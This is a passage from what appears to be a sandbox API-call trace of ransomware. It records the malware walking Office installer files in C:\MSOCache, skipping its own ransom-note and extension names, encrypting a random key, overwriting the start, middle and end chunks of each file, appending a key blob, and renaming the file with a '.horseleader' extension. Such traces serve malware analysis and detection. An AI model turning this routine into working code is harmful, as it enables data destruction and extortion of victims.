lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.427] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.427] CloseHandle (hObject=0x21c) returned 1 [0219.427] GetProcessHeap () returned 0x780000 [0219.427] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.427] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0219.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0219.428] GetProcessHeap () returned 0x780000 [0219.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.428] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0219.428] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Windows") returned -1 [0219.428] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0219.428] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".horseleader") returned 0x0 [0219.428] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="#Decrypt#.txt") returned 1 [0219.428] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="_uninstalling_.png") returned 1 [0219.428] lstrlenW (lpString=".testttjffg") returned 11 [0219.428] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpSrch=".testttjffg") returned 0x0 [0219.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.429] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.434] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0219.434] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".txt") returned 0x0 [0219.434] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=27532288) returned 1 [0219.434] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.434] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.437] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.438] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd1e600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.439] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.441] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.441] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.441] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1a3cc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.441] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.444] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.444] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.444] CloseHandle (hObject=0x21c) returned 1 [0219.444] GetProcessHeap () returned 0x780000 [0219.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.445] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.horseleader") returned 93 [0219.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.horseleader")) returned 1 [0219.446] GetProcessHeap () returned 0x780000 [0219.446] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.446] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0219.446] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Windows") returned -1 [0219.446] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0219.446] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".horseleader") returned 0x0 [0219.446] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="#Decrypt#.txt") returned 1 [0219.446] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="_uninstalling_.png") returned 1 [0219.446] lstrlenW (lpString=".testttjffg") returned 11 [0219.446] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpSrch=".testttjffg") returned 0x0 [0219.446] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.446] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.447] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0219.447] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".txt") returned 0x0 [0219.447] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16852) returned 1 [0219.447] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x41d4, lpOverlapped=0x0) returned 1 [0219.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffbe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x41d4, lpOverlapped=0x0) returned 1 [0219.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.449] CloseHandle (hObject=0x21c) returned 1 [0219.450] GetProcessHeap () returned 0x780000 [0219.450] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.450] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.horseleader") returned 93 [0219.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.horseleader")) returned 1 [0219.453] GetProcessHeap () returned 0x780000 [0219.453] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.453] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0219.453] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Windows") returned -1 [0219.453] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0219.453] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".horseleader") returned 0x0 [0219.454] lstrcmpW (lpString1="ProPrWW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.454] lstrcmpW (lpString1="ProPrWW.cab", lpString2="_uninstalling_.png") returned 1 [0219.454] lstrlenW (lpString=".testttjffg") returned 11 [0219.454] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpSrch=".testttjffg") returned 0x0 [0219.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.454] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.454] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.455] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0219.455] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".txt") returned 0x0 [0219.455] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=177720283) returned 1 [0219.455] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.455] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.491] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.493] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54bbded, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.493] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.496] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.497] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.497] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa977bdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.497] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.500] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.500] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.500] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.501] CloseHandle (hObject=0x21c) returned 1 [0219.501] GetProcessHeap () returned 0x780000 [0219.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.501] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.horseleader") returned 90 [0219.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.horseleader")) returned 1 [0219.502] GetProcessHeap () returned 0x780000 [0219.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.502] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0219.502] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Windows") returned -1 [0219.502] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0219.502] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".horseleader") returned 0x0 [0219.502] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="#Decrypt#.txt") returned 1 [0219.502] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="_uninstalling_.png") returned 1 [0219.502] lstrlenW (lpString=".testttjffg") returned 11 [0219.502] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpSrch=".testttjffg") returned 0x0 [0219.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.502] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0219.504] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".txt") returned 0x0 [0219.504] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=222948913) returned 1 [0219.504] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.504] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.514] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.514] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.514] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6a4cf18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.514] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.520] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.520] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.521] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd499e31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.521] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.523] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.523] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.524] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.524] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.524] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.524] CloseHandle (hObject=0x21c) returned 1 [0219.524] GetProcessHeap () returned 0x780000 [0219.524] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.524] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.horseleader") returned 91 [0219.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: 